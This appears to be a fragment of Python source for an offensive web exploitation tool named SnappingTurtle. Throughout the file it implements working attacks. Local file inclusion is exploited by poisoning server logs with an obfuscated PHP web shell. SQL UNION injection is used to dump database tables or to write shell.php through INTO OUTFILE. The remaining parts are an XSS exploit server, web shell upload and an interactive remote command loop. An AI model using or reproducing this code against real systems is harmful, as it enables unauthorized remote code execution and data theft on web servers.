    names = ["access.log", "access_log", "acces.log", "acces_log", "error.log", "error_log"]
    def __init__(self, searchValue, reqTmpl, dot = ".", separator = "/", terminator = "", min = 0, max = 8):
        (self.searchValue) = searchValue
        (self.reqTmpl) = reqTmpl
        (self.dot) = dot
        (self.separator) = separator
        (self.terminator) = terminator
        (self.min) = min
        (self.max) = max
        (self.files) = (self.createPaths)()

    def createPaths(self):
        def var_func_0000001B(x):
            def var_func_00000031(y):
                return (x + [y])

            return (lambda var_0000001B:select(var_func_00000031, var_0000001B))((self.names))

        return (lambda var_0000001C:selectMany(var_func_0000001B, var_0000001C))((self.dirs))

    def seqs(self):
        return TraversalRange((self.files), (self.min), (self.max), (self.dot), (self.separator), (self.terminator))

    def scan(self):
        for x in (self.seqs)():
            r = (self.testSeq)(x)
            if (r != None):
                return r

    def testSeq(self, seq):
        values = {"lfi": seq}
        url = ((self.reqTmpl).getUrl)(values)
        (self.log)(("[?] %s" % url))
        data = ((self.reqTmpl).getPost)(values)
        if (data != None):
            (self.log)(("    " + str(data)))
        resp = ((urllib2.urlopen)(url, data).read)()
        t = url, data
        return ((t) if ((resp.__contains__)((self.searchValue))) else (None))


from random import shuffle, randint
class PhpShellEmitter():
    stages = [[], [], [], []]
    emitter = None
    prefix = None
    suffix = None
    padMin = 10
    padMax = 32
    junkChars = (lambda var_0000001D:select(chr, var_0000001D))((lambda var_0000001E:where(var_func_0000001C, var_0000001E))((lambda var_0000001F:where(var_func_0000001D, var_0000001F))(range(33, 127))))
    def __init__(self):
        (self.emitter) = PhpEmitter()

    def stageDecl(self, stage, value):
        id, assign = ((self.emitter).declStmt)(value)
        ((self.stages)[stage].append)(assign)
        return id

    def varRef(self, stage, name):
        return (self.stageDecl)(stage, ("$" + (self.stageDecl)((stage - 1), ((self.emitter).string)(name, False))))

    def emit(self, command = None, pad = False):
        ((self.emitter).chr) = (self.stageDecl)(0, ((self.emitter).string)("chr", False, False))
        system = (self.stageDecl)(1, ((self.emitter).string)("system", False))
        if (command == None):
            input = (self.varRef)(2, "_GET")
            systemCallStmt = ((self.emitter).callStmt)(system, ((self.emitter).arrayAccess)(input, ((self.emitter).string)("cmd", False)))
        else:
            cmdStr = ((self.emitter).string)(command, False)
            systemCallStmt = ((self.emitter).callStmt)(system, cmdStr)
        ((self.stages)[3].append)(systemCallStmt)
        (lambda var_00000020:iter(shuffle, var_00000020))((lambda var_00000021:skip(1, var_00000021))((self.stages)))
        php = ""
        x = ((self.emitter).doc)(addAll(flatten((self.stages))))
        return ((x) if (not pad) else ((self.pad)(x)))

    def emitJunk(self):
        def var_func_0000001E(x):
            return choice((self.junkChars))

        return addAll((lambda var_00000022:select(var_func_0000001E, var_00000022))(range(0, randint((self.padMin), (self.padMax)))))

    def pad(self, value):
        (self.prefix) = (self.emitJunk)()
        (self.suffix) = (self.emitJunk)()
        return (((self.prefix) + value) + (self.suffix))


from random import choice, randint
class PhpEmitter():
    varNames = []
    chr = "chr"
    min = -2147483648
    max = 2147483647
    def doc(self, body):
        return ("<?php %s ?>" % body)

    def stmt(self, exp):
        return (exp + ";")

    def declStmt(self, value):
        n = (self.nextVar)()
        return n, (self.assignStmt)(n, value)

    def assignStmt(self, var, value):
        return (self.stmt)(("{}={}".format)(var, value))

    def arrayAccess(self, array, dim):
        return ("{}[{}]".format)(array, dim)

    def callStmt(self, target, args):
        return (self.stmt)((lambda var_00000023:(self.call)(target, var_00000023))(args))

    def call(self, target, args):
        return ("{}({})".format)(target, args)

    def string(self, string, allowPassthru = True, allowChars = True):
        funcs = [(self.splitString)]
        if allowChars:
            (funcs.append)((self.chars))
        return choice(funcs)(string)

    def echo(self, value):
        return (self.stmt)(("echo %s" % value))

    def splitString(self, string):
        l = len(string)
        if (l < 2):
            return (self.string)(string)
        i = randint(1, (l - 1))
        lhs = (self.string)(string[0:i])
        rhs = (self.string)(string[i:l])
        return ((lhs + ".") + rhs)

    def chars(self, str):
        return (lambda var_00000024:join(".", var_00000024))((lambda var_00000025:select((self.char), var_00000025))(str))

    def char(self, char):
        c = ord(char)
        n = choice([c, (self.widenByte)(c)])
        return ("{}({})".format)((self.chr), (self.number)(n))

    def number(self, number):
        return choice([(self.emit), (self.addition), (self.subtraction)])(number)

    def addition(self, number):
        def var_func_0000001F(x, y):
            return (x - y)

        return (self.binOp)(number, "+", var_func_0000001F)

    def subtraction(self, number):
        def var_func_00000020(x, y):
            return (x + y)

        return (self.binOp)(number, "-", var_func_00000020)

    def binOp(self, number, op, func):
        while True:
            x = (self.nextInt)()
            lhs = func(number, x)
            if ((self.validNum)(x) and (self.validNum)(lhs)):
                break
        rhs = (self.number)(x)
        fmt = (("({}{} {})") if ((op == str(rhs)[:1])) else ("({}{}{})"))
        return (fmt.format)(lhs, op, rhs)

    def emit(self, value):
        return value

    def nextInt(self):
        def var_func_00000021(x):
            return randint(((self.min) >> x), ((self.max) >> x))

        return choice((lambda var_00000026:select(var_func_00000021, var_00000026))([0, 8, 16, 32]))

    def nextVar(self):
        l = randint(1, 1)
        def var_func_00000022(x):
            return (self.getRandChar)()

        while True:
            v = ("$" + addAll((lambda var_00000027:select(var_func_00000022, var_00000027))(range(0, l))))
            if not ((self.varNames).__contains__)(v):
                ((self.varNames).append)(v)
                return v

    def quote(self, string):
        return ("\"%s\"" % (self.escape)(string))

    def getRandChar(self):
        return choice((self.getAllChars)())

    def getAllChars(self):
        return (((self.getChars)("a") + (self.getChars)("A")) + "_")

    def getChars(self, start):
        def var_func_00000023(x):
            return chr((ord(start) + x))

        return addAll((lambda var_00000028:select(var_func_00000023, var_00000028))(range(0, 26)))

    def escape(self, string):
        return ((string.replace)("\\", "\\\\").replace)("\"", "\\\"")

    def widenByte(self, number):
        mask = ((self.max) & ~255)
        while True:
            x = (((self.nextInt)() & mask) | number)
            if (self.validNum)(x):
                return x

    def validNum(self, number):
        return (((self.min) <= number) and (number <= (self.max)))


from urlparse import urlparse
class LogInjector(ExploitComponent):
    repo = JsonRepository("logShells.json")
    def __init__(self, reqTmpl, dot = ".", separator = "/", terminator = ""):
        (self.reqTmpl) = reqTmpl
        (self.dot) = dot
        (self.separator) = separator
        (self.terminator) = terminator
        (self.probe) = TraversalProbe("blank command", reqTmpl, dot, separator, terminator)
        (self.emitter) = PhpShellEmitter()
        (self.url) = (reqTmpl.url)

    def findShell(self):
        (self.log)("[i] Searching for shell")
        s = ((self.probe).scan)()
        if (s != None):
            (self.log)("[+] Shell found")
            if self.url in self.repo.repo:
                tags = ((self.repo).repo)[(self.url)]
                ((self.emitter).prefix) = tags[0]
                ((self.emitter).suffix) = tags[1]
            else:
                (self.log)("[-] Error: could not find shell prefix/suffix")
        else:
            (self.log)("[-] Shell not found")
        return s

    def sendShell(self):
        (self.log)("[i] Injecting shell")
        shell = ((self.emitter).emit)(pad = True)
        u = ((((self.reqTmpl).getUrl)({"lfi": shell})) if (((self.url).__contains__)("$lfi")) else ((((self.url) + "?") + shell)))
        ((self.repo).add)((self.url), [((self.emitter).prefix), ((self.emitter).suffix)])
        (self.log)(("    Url: " + u))
        (urllib2.urlopen)(u)

    def inject(self):
        shell = (self.findShell)()
        if (shell == None):
            (self.sendShell)()
            shell = (self.findShell)()
        return shell


import urllib
class LfiShell(ExploitComponent):
    shellInfo = None
    def __init__(self, reqTmpl, dot = ".", separator = "/", terminator = ""):
        (self.injector) = LogInjector(reqTmpl, dot, separator, terminator)

    def create(self):
        i = ((self.injector).inject)()
        if (i == None):
            (self.log)("[-] Could not exploit LFI")
            return False
        (self.shellInfo) = i
        return True

    def run(self, cmd):
        if ((self.shellInfo) == None):
            (self.log)("[!] No known shell")
            if not (self.create)():
                return None
            quit()
        u = (self.createCmdUrl)(cmd)
        (self.log)(("[?] %s" % u))
        _, d = (self.shellInfo)
        postData = d
        if (postData != None):
            (self.log)(("    " + str(postData)))
        resp = (self.parseResp)(((urllib2.urlopen)(u, postData).read)())
        return resp

    def parseResp(self, resp):
        def fan(v):
            def var_func_00000024(x):
                return [x, (x.upper)(), (x.lower)()]

            return distinct((lambda var_00000029:selectMany(var_func_00000024, var_00000029))([v, ((v.replace)("\\", "\\\\").replace)("\"", "\\\"")]))

        def split(v, t):
            for tag in fan(t):
                if (len(v) != 2):
                    v = (v[0].split)(tag)
                else:
                    break
            return v

        e = ((self.injector).emitter)
        if ((e.prefix) == None):
            return resp
        p = split([resp], (e.prefix))
        if (len(p) < 2):
            return resp
        return split([p[1]], (e.suffix))[0]

    def createCmdUrl(self, cmd):
        u, _ = (self.shellInfo)
        d = (urllib.urlencode)({"cmd": cmd})
        x = (("&") if ((u.__contains__)("?")) else ("?"))
        return ((u + x) + d)


class SqlEmitter():
    alpha = (CharRange.alpha)()
    def getChars(self):
        def var_func_00000025(___p_op_5):
            return (___p_op_5 != (self.quote)())

        return (lambda var_0000002A:select(chr, var_0000002A))((lambda var_0000002B:where(var_func_00000025, var_0000002B))(range(32, 128)))

    def tup(self, vals):
        def var_func_00000026(x, y):
            return (((x + ",") + (self.space)()) + y)

        return (lambda var_0000002C:aggr(var_func_00000026, var_0000002C))(vals)

    def words(self, words):
        def var_func_00000027(x, y):
            return ((x + (self.space)()) + y)

        return (lambda var_0000002D:aggr(var_func_00000027, var_0000002D))(words)

    def space(self):
        return " "

    def quote(self):
        return "'"

    def junkCharRange(self):
        def var_func_00000028(x):
            return choice((self.alpha))

        return (lambda var_0000002E:join("", var_0000002E))((lambda var_0000002F:select(var_func_00000028, var_0000002F))((lambda var_00000030:range(0, var_00000030))(randint(8, 32))))

    def junkString(self):
        return ("{1}{0}{1}".format)((self.junkCharRange)(), (self.quote)())

    def unionAll(self, cols):
        return (self.words)(["UNION", "SELECT", "ALL", (self.tup)(cols)])

    def comment(self):
        return "#"


import re
class SqlUnionInjector(ExploitComponent):
    def __init__(self, options, columns, dump_column, target_columns, target_table, delimiter = "'", delim = "'", row_start = "--start--", row_end = "--end--", where = None, terminator = "#"):
        (self.options) = options
        (self.columns) = columns
        (self.dump_column) = dump_column
        (self.target_columns) = target_columns
        (self.target_table) = target_table
        (self.delimiter) = delimiter
        (self.delim) = delim
        (self.row_start) = row_start
        (self.row_end) = row_end
        (self.where) = where
        (self.terminator) = terminator
        (self.host) = options["HOST"]
        (self.port) = options["PORT"]
        (self.dump) = ("Dump {}".format)(target_table)
        (self.shell) = None
        (self.payload) = None
        options["PAYLOAD"] = dict(options = [(self.dump), (self.shell)], selected = (self.dump))

    def set_payload(self, payload):
        def var_func_00000029():
            (self.payload) = payload

        return var_func_00000029

    def is_dump(self):
        return ((self.payload) == (self.dump))

    def str(self):
        s = ""
        if (self.delimiter):
            s += (self.delimiter)
        s += "UNION SELECT "
        if (self.delim):
            empty = ((self.delim) * 2)
            delim = (self.delim)
        else:
            empty = "0"
            delim = "'"
        if (self.is_dump)():
            s += (self.union)(empty, delim)
            if ((self.where) != None):
                s += (" " + (self.where))
        else:
            s += (self.shell)(empty, delim)
        s += (self.terminator)
        return s

    def union(self, empty, delim):
        s = ((empty + ",") * (self.dump_column))
        s += ("CONCAT_WS({0}stdelim{0},{0}{1}{0},".format)(delim, (self.row_start))
        def var_func_0000002A(x):
            return ("IFNULL(%s,'')" % x)

        s += (",".join)((lambda var_00000031:select(var_func_0000002A, var_00000031))((self.target_columns)))
        s += (",{0}{1}{0})".format)(delim, (self.row_end))
        s += (("," + empty) * (((self.columns) - (self.dump_column)) - 1))
        s += (" FROM {}".format)((self.target_table))
        return s

    def shell(self, empty, delim):
        shell_delim = (("\"") if ((delim == "'")) else ("'"))
        shell = ("{0}<?php system($_GET[{1}cmd{1}]); ?>{0}".format)(delim, shell_delim)
        col_seq = (shell + (("," + empty) * ((self.columns) - 1)))
        directory = "htdocs/"
        traverse = ("../" * 2)
        shell_file = "shell.php"
        s = ("{0} FROM dual INTO OUTFILE {1}{2}{3}{4}{1}{5}".format)(col_seq, delim, traverse, directory, shell_file, (self.terminator))
        return s

    def finalize(self, resp):
        def var_func_0000002B(___p_op_6):
            return (___p_op_6.split("stdelim"))

        if (self.is_dump)():
            pattern = ("{}stdelim(.*?)stdelim{}".format)((self.row_start), (self.row_end))
            matches = (re.findall)(pattern, resp)
            return (lambda var_00000032:select(var_func_0000002B, var_00000032))(matches)
        else:
            u = ("http://{}:{}/shell.php".format)((self.host), (self.port))
            s = ("GET {}\r\n".format)(u)
            code = ((urllib2.urlopen)(u).getcode)()
            if (code == 200):
                s += ("Shell found at {}".format)(u)
            else:
                s += "Shell not found, exploit failed"
            return s


import sys
from ast import literal_eval
class CliArgs():
    Mode = None
    ModeOption = None
    ModeOption2 = None
    Get = None
    Post = None
    File = None


class ParserState():
    Class = 0
    Url = 1
    Option = 2
    OptionValue = 3
    OptionValue2 = 4
    ModeOption = 5
    ModeOption2 = 6
    Filename = 7
    FileData = 8


class ArgOption():
    GetPair = "-g"
    PostPair = "-p"
    Get = "--g"
    Post = "--p"
    File = "-f"


class ClassOption():
    Lfi = "lfi"
    Sqli = "sqli"
    Xss = "xss"
    Shell = "shell"
    Upload = "upload"


class SqliOption():
    List = "list"
    Table = "table"


def parseArgs():
    i = 0
    key = None
    key2 = None
    key3 = None
    state = (ParserState.Class)
    obj = CliArgs()
    args = (lambda var_00000033:skip(1, var_00000033))((sys.argv))
    for x in args:
        _cwSwitchValue_0000 = state
        if (_cwSwitchValue_0000 == (ParserState.Class)):
            (obj.Mode) = x
            _cwSwitchValue_0001 = x
            if ((_cwSwitchValue_0001 == (ClassOption.Sqli)) or (_cwSwitchValue_0001 == (ClassOption.Xss))):
                state = (ParserState.ModeOption)
            else:
                state = (ParserState.Url)
        else:
            if (_cwSwitchValue_0000 == (ParserState.ModeOption)):
                (obj.ModeOption) = x
                if (((obj.Mode) == (ClassOption.Sqli)) and ((obj.ModeOption) == (SqliOption.Table))):
                    state = (ParserState.ModeOption2)
                else:
                    state = (ParserState.Url)
            else:
                if (_cwSwitchValue_0000 == (ParserState.ModeOption2)):
                    (obj.ModeOption2) = x
                    state = (ParserState.Url)
                else:
                    if (_cwSwitchValue_0000 == (ParserState.Url)):
                        (obj.Url) = x
                        state = (ParserState.Option)
                    else:
                        if (_cwSwitchValue_0000 == (ParserState.Option)):
                            key = x
                            state = (ParserState.OptionValue)
                        else:
                            if (_cwSwitchValue_0000 == (ParserState.OptionValue)):
                                _cwSwitchValue_0002 = key
                                if (_cwSwitchValue_0002 == (ArgOption.Get)):
                                    (obj.Get) = literal_eval(x)
                                    state = (ParserState.Option)
                                else:
                                    if (_cwSwitchValue_0002 == (ArgOption.Post)):
                                        (obj.Post) = literal_eval(x)
                                        state = (ParserState.Option)
                                    else:
                                        if ((_cwSwitchValue_0002 == (ArgOption.GetPair)) or (_cwSwitchValue_0002 == (ArgOption.PostPair))):
                                            key2 = x
                                            state = (ParserState.OptionValue2)
                                        else:
                                            if (_cwSwitchValue_0002 == (ArgOption.File)):
                                                key2 = x
                                                state = (ParserState.Filename)
                            else:
                                if (_cwSwitchValue_0000 == (ParserState.OptionValue2)):
                                    d = None
                                    _cwSwitchValue_0003 = key
                                    if (_cwSwitchValue_0003 == (ArgOption.GetPair)):
                                        if ((obj.Get) == None):
                                            (obj.Get) = dict()
                                        d = (obj.Get)
                                    else:
                                        if (_cwSwitchValue_0003 == (ArgOption.PostPair)):
                                            if ((obj.Post) == None):
                                                (obj.Post) = dict()
                                            d = (obj.Post)
                                    d[key2] = x
                                    state = (ParserState.Option)
                                else:
                                    if (_cwSwitchValue_0000 == (ParserState.Filename)):
                                        key3 = x
                                        state = (ParserState.FileData)
                                    else:
                                        if (_cwSwitchValue_0000 == (ParserState.FileData)):
                                            if ((obj.File) == None):
                                                (obj.File) = []
                                            ((obj.File).append)(HttpFile(key2, key3, x))
                                            state = (ParserState.Option)
                                        else:
                                            print(("Error parsing argument: %s" % x))
                                            quit()
        i = (i + 1)
    return obj

hasArgs = var_func_0000002C(len((sys.argv)))
args = parseArgs()
import json
class ShellCommand():
    Quit = "quit"


def shellLoop(shell):
    while True:
        cmd = raw_input("st>")
        _cwSwitchValue_0004 = cmd
        if (_cwSwitchValue_0004 == (ShellCommand.Quit)):
            print("Exiting")
            quit()
        else:
            print((shell.run)(cmd))

def listTables(tmpl):
    probe = SqlUnionProbe(tmpl)
    di = (probe.listSchemas)()
    if (di == None):
        print("[X] List tables failed\r\n")
        return None
    keys = (di.keys)()
    print(("[+] %s databases found\r\n" % len(keys)))
    for key in keys:
        print(("    " + key))
        for table in di[key]:
            print(("      " + table))
        print("")

def printTable(columns, rows):
    def var_func_0000002D(x):
        return ""

    rows = (([columns] + [(lambda var_00000034:select(var_func_0000002D, var_00000034))(columns)]) + rows)
    def var_func_0000002E(x):
        return (sorted(x, reverse = True)[0] + 1)

    def var_func_0000002F(x):
        def var_func_00000032(y):
            return ((len(y[x])) if ((x < len(y))) else (0))

        return (lambda var_00000035:select(var_func_00000032, var_00000035))(rows)

    colLens = (lambda var_00000036:select(var_func_0000002E, var_00000036))((lambda var_00000037:select(var_func_0000002F, var_00000037))(range(0, len(columns))))
    for row in rows:
        i = 0
        for col in row:
            maxLen = colLens[i]
            pad = (maxLen - len(col))
            ((sys.stdout).write)((col + (" " * (pad + 1))))
            i = (i + 1)
        ((sys.stdout).write)("\r\n")
    ((sys.stdout).write)("\r\n")

print(("SnappingTurtle Web Exploitation Tool 0.1." + "0324.1445"))
print("http://autosectools.com/SnappingTurtle\r\n")
if hasArgs:
    shell = None
    tmpl = HttpRequestTemplate((args.Url), (args.Get), (args.Post), (args.File))
    _cwSwitchValue_0005 = (args.Mode)
    if (_cwSwitchValue_0005 == (ClassOption.Lfi)):
        print("[i] Exploiting local file inclusion")
        shell = LfiShell(tmpl)
        if not (shell.create)():
            print("[X] Failed to create shell, exiting\r\n")
            quit()
    else:
        if (_cwSwitchValue_0005 == (ClassOption.Sqli)):
            print("[i] Exploiting SQL injection")
            _cwSwitchValue_0006 = (args.ModeOption)
            if (_cwSwitchValue_0006 == (SqliOption.List)):
                print("[?] Listing databases and tables")
                listTables(tmpl)
            else:
                if (_cwSwitchValue_0006 == (SqliOption.Table)):
                    p = ((args.ModeOption2).split)(".")
                    schema = p[0]
                    table = p[1]
                    print(("[?] Dumping table '{}' of database '{}'".format)(table, schema))
                    probe = SqlUnionProbe(tmpl)
                    columns = (probe.listColumns)(schema, table)
                    if (columns == None):
                        print("[X] Could not enumerate columns\r\n")
                        quit()
                    rows = (probe.dumpTable)(table, columns = columns)
                    if (rows != None):
                        print("\r\n[+] Table dumped:\r\n")
                        printTable(columns, rows)
                    else:
                        print("[X] Could not dump table\r\n")
                        quit()
                else:
                    print("[X] Invalid SQL injection option\r\n")
                    quit()
            quit()
        else:
            if (_cwSwitchValue_0005 == (ClassOption.Xss)):
                print("[i] Starting XSS server\r\n")
                ip = (args.ModeOption)
                server = ExploitServer(ip)
                xss = (server.createExploit)(tmpl)
                print(("[+] XSS URL:\r\n\r\n    %s\r\n" % xss))
                (server.serveForever)()
            else:
                if (_cwSwitchValue_0005 == (ClassOption.Upload)):
                    php = (PhpShellEmitter().emit)()
                    values = {"php": php}
                    file = (tmpl.getFile)(values)
                    if ((file == None) or (len(file) == 0)):
                        print("[X] No file specified to upload, exiting.")
                        quit()
                    tup = (lambda var_00000038:join(", ", var_00000038))((lambda var_00000039:select(var_func_00000030, var_00000039))(file))
                    print(("[i] Uploading: %s\r\n" % tup))
                    resp = (Http.request)((tmpl.getUrl)(values), (tmpl.getPost)(values), file)
                    print(("\r\n[+] Response:\r\n\r\n%s\r\n" % resp))
                    quit()
                else:
                    if (_cwSwitchValue_0005 == (ClassOption.Shell)):
                        print(("[i] Connecting to shell: %s" % (args.Url)))
                        shell = (Shell.open)((args.Url))
                        if (shell == None):
                            print("[X] Failed to open shell, exiting.")
                            quit()
                    else:
                        print(("[X] Invalid strategy: %s\r\n" % (args.Mode)))
                        quit()
    shellLoop(shell)
else:
    print("python azzatssins.py [exploitation strategy] [url] [inputs]\r\n")
    print("# Exploitation Strategies\r\n")
    print("  lfi                Local file inclusion. Injection is performed using the $lfi token.")
    print("")
    print("  sqli {options}     SQL injection. Injection is performed using the $sqli token.")
    print("")
    print("    If used, one of two options must be specified:")
    print("")
    print("    list             Dumps a list of databases and tables.")
    print("    table {name}     Dumps a database table.")
    print("")
    print("  xss {server ip}    Cross-site scripting. Injection is performed using the $xss token.")
    print("")
    print("    If used, a target accessible server IP must be specified for listening.")
    print("")
    print("  upload             Arbitrary upload. Write data to the server using the -f option.")
    print("")
    print("    If used, at least one file must be specified using the -f option.")
    print("    Built-in shells can be injected using the $php token.")
    print("")
    print("  shell {shell url}  Connects to a previously created shell.")
    print("")
    print("# Url\r\n")
    print("  The url to exploit. Can be injected into using tokens.\r\n")
    print("# Inputs\r\n")
    print("  -g {GET name} {GET value}          GET data in key/value format.")
    print("  -p {POST name} {POST value}        POST data in key/value format.")
    print("  --g {GET data}                     GET data in Python map format.")
    print("  --p {POST data}                    POST data in Python map format.")
    print("  -f {name} {filename} {file data}   POST data as a file.")
    print("")
    print("# Examples\r\n")
    print("  python st.py lfi http://localhost/lfiTest.php?theme=$lfi\r\n")
    print("  python st.py lfi http://localhost/lfiTest.php -g theme $lfi\r\n")
    print("  python st.py lfi http://localhost/lfiTest.php?theme=$lfi%00\r\n")
    print("  python st.py lfi http://localhost/postTest.php --p \"{'theme':'$lfi'}\"\r\n")
    print("  python st.py sqli list http://localhost/sqliTest.php -g email $sqli\r\n")
    print("  python st.py sqli table sqlitest.users http://localhost/sqliTest.php -g email $sqli\r\n")
    print("  python st.py xss 10.0.0.122 http://10.0.0.145/xss.php -g search $xss\r\n")
    print("  python st.py upload http://10.0.0.145/upload.php -f file shell.php $php\r\n")
    print("  python st.py shell http://10.0.0.145/shell.php\r\n")